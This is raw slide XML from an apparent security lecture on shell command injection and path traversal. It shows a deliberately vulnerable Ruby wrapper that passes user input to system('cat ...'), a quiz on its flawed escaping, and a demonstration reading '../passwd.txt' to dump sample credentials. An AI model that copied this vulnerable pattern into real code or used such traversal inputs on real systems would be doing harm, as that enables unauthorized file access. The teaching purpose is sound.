                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0" err="1"/>
              <a:t>nd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"cat "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>escape_chars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>(ARGV[0])) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 430">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56C61A74-9C77-2E06-ED90-5B1C3CAEC255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11975780" y="2900768"/>
            <a:ext cx="4498025" cy="82137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b="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" i="1" dirty="0"/>
              <a:t>catwrapper.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2186136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9BB94-9EB2-3B65-D1EB-EEC9BED75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6D1C6-784F-2B14-B0E8-D58D577A54FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370114" y="625078"/>
            <a:ext cx="23513143" cy="1936068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8800" dirty="0"/>
              <a:t>Quiz 3: Is this escaping sufficient?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6634BE84-341B-315C-356E-FE2FED87D06D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1700590" y="3144027"/>
            <a:ext cx="9555240" cy="9336129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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dirty="0"/>
              <a:t>No, you should also escape character </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>No, some of the escaped characters are dangerous even when escaped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Both of the above</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Yes, it’s all good</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7718569A-7836-4E16-FF2E-89FAA5EA698E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 429">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BC5D22F-1B57-F804-D294-05A1EA65AA74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11975780" y="3722146"/>
            <a:ext cx="11429410" cy="3222035"/>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lang="mr-IN" sz="4000" b="1" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0" err="1"/>
              <a:t>escape_chars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0" err="1"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0" err="1"/>
              <a:t>pat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t> = </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a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0" err="1"/>
              <a:t>string.gsub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0" err="1"/>
              <a:t>pat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t>){|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0" err="1"/>
              <a:t>match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t>|"\\" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0" err="1"/>
              <a:t>match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0"/>
              <a:t>} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="4000" dirty="0" err="1"/>
              <a:t>nd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"cat "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>escape_chars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>(ARGV[0])) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 430">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC784A19-24CD-3BA3-3F3C-A472746BB025}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11975780" y="2900768"/>
            <a:ext cx="4498025" cy="82137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b="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" i="1" dirty="0"/>
              <a:t>catwrapper.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="126075642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20CB-EE03-A1F3-CE79-C72D6D6CF7A8}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Shape 488">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E87CBC4-504A-4AF5-A230-61244B71836B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4378522" y="578269"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="490727">
              <a:defRPr sz="9407"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Escaping not always enough</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489" name="Shape 489">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F3AFACD-6EF5-6C65-AECE-C10D0309BF3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5642681" y="3044641"/>
            <a:ext cx="13192713" cy="39914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a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>&gt; ls ../</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>passwd.txt</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>passwd.txt</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>&gt; ruby </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>catwrapper.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>passwd.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>bob:apassword</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>alice:anotherpassword</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Shape 490">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{047C3A27-EB5D-16FD-33CC-ED7AF150E174}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="7802615"/>
            <a:ext cx="15609094" cy="4808539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>A web service probably only wants to give access to the files in the current directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>the .. sequence should have been disallowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Previous escaping doesn’t help because . is replaced with \. which the shell interprets as .</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC9F4F2F-8BE7-E7A8-59B4-C5ECEA4BFB31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1194159461"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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89">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489">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4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490">
                                            <p:bg/>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49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490">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4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0" build="p" bldLvl="5" animBg="1" advAuto="0"/>
      <p:bldP spid="490"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6486-C7DB-9F5C-6EEC-C0F414B0C2B6}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Shape 492">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{137553B4-142F-E6CE-973C-47DBF6AF67DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Path traversal </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="Shape 493">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{160D7881-6D91-6EBB-3124-87FBE8F9FC3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>This is called a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>path traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> vulnerability. Solutions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Delete all occurrences of the . character</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Will disallow legitimate files with dots in them (</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Delete occurrences of .. sequences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Safe, but disallows </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>foo/../hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> is a subdirectory in the current working directory (CWD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Ideally: Allow any path that is within the CWD or one of its subdirectories</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59E042F6-7FF4-FB07-FDEE-02C22DA9EACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19612264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3">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49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3">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49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93">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49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93">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49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93">
                                            <p:txEl>
